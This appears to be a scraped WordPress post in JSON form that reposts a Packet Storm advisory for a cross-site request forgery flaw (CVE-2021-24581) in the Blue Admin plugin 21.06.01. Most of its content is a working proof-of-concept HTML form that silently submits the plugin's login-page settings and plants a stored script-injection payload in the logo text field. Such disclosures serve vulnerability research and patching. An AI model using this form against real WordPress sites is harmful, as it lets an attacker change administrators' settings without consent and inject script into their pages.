{"id":24351,"date":"2022-05-12T00:28:22","date_gmt":"2022-05-11T20:28:22","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/167087\/wpblueadmin210601-xsrf.txt"},"modified":"2022-05-15T09:38:42","modified_gmt":"2022-05-15T05:08:42","slug":"wordpress-blue-admin-21-06-01-cross-site-request-forgery","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-blue-admin-21-06-01-cross-site-request-forgery\/","title":{"rendered":"WordPress Blue Admin 21.06.01 Cross Site Request Forgery"},"content":{"rendered":"<dl id=\"F167087\" class=\"file first\">\n<dt dir=\"ltr\"><a class=\"ico text-plain\" title=\"Size: 1.3 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/167087\/wpblueadmin210601-xsrf.txt\" target=\"_blank\" rel=\"noopener\"><strong>WordPress Blue Admin 21.06.01 Cross Site Request Forgery<\/strong><\/a><\/dt>\n<dd class=\"datetime\" dir=\"ltr\">Posted <a title=\"16:47:18 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2022-05-11\/\" target=\"_blank\" rel=\"noopener\">May 11, 2022<\/a><\/dd>\n<dd class=\"refer\" dir=\"ltr\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/16317\/\" target=\"_blank\" rel=\"noopener\">Abisheik M<\/a><\/dd>\n<dd class=\"detail\" dir=\"ltr\">WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability.<\/dd>\n<dd class=\"tags\" dir=\"ltr\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/csrf\" target=\"_blank\" rel=\"noopener\">csrf<\/a><\/dd>\n<dd class=\"md5\" dir=\"ltr\">SHA-256 | <code>565e1dfee9a847dbd07998efdff9ee95a2f3f8e9796f37efdf64ce435d785ed9<\/code><\/dd>\n<dd class=\"act-links\" dir=\"ltr\"><a title=\"Size: 1.3 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/167087\/wpblueadmin210601-xsrf.txt\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/167087\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/167087\/WordPress-Blue-Admin-21.06.01-Cross-Site-Request-Forgery.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" dir=\"ltr\">\n<pre><code>Exploit Title: WordPress Plugin Blue Admin 21.06.01 - Cross-Site Request Forgery (CSRF)\r\nDate: 2021-07-27\r\nExploit Author : Abisheik M \r\nVendor Homepage : https:\/\/wpscan.com\/plugin\/blue-admi\r\nVersion : &lt;= 21.06.01\r\nTested on: windows 10 Professional\r\nCVE : CVE-2021-24581<\/code><\/pre>\n<p>&lt;html&gt;<br \/>\n&lt;body&gt;<br \/>\n&lt;form action=&#8221;http:\/\/example.com\/wp-admin\/admin.php?page=blue-admin&amp;tab=blue_admin_login_page&#8221; method=&#8221;POST&#8221; enctype=&#8221;multipart\/form-data&#8221;&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[fm_bg_color]&#8221; value=&#8221;FFFFFF&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[fm_color]&#8221; value=&#8221;777777&#8243; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[logo_text]&#8221; value=&#8217;WP&#8221;&gt;&lt;script&gt;alert(\/XSS\/)&lt;\/script&gt;&#8217; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[logo_url]&#8221; value=&#8221;https:\/\/example.com&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[logo_img]&#8221; value=&#8221;&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[bg_color]&#8221; value=&#8221;EEEEEE&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[text_color]&#8221; value=&#8221;222222&#8243; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[bg_img]&#8221; value=&#8221;&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[bg_img_pos]&#8221; value=&#8221;&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_attr[bg_img_rep]&#8221; value=&#8221;&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;hidden&#8221; name=&#8221;ba_lp_options_save&#8221; value=&#8221;Save changes&#8221; \/&gt;<br \/>\n&lt;input type=&#8221;submit&#8221; value=&#8221;Submit request&#8221; \/&gt;<br \/>\n&lt;\/form&gt;<br \/>\n&lt;\/body&gt;<br \/>\n&lt;\/html&gt;<\/p>\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>WordPress Blue Admin 21.06.01 Cross Site Request Forgery Posted May 11, 2022 Authored by Abisheik M WordPress Blue Admin plugin version 21.06.01 suffers from a cross site request forgery vulnerability. tags | exploit, csrf SHA-256 | 565e1dfee9a847dbd07998efdff9ee95a2f3f8e9796f37efdf64ce435d785ed9 Download | Favorite | View Exploit Title: WordPress Plugin Blue Admin 21.06.01 &#8211; Cross-Site Request Forgery (CSRF) Date: &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-24351","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24351","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=24351"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/24351\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=24351"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=24351"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=24351"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}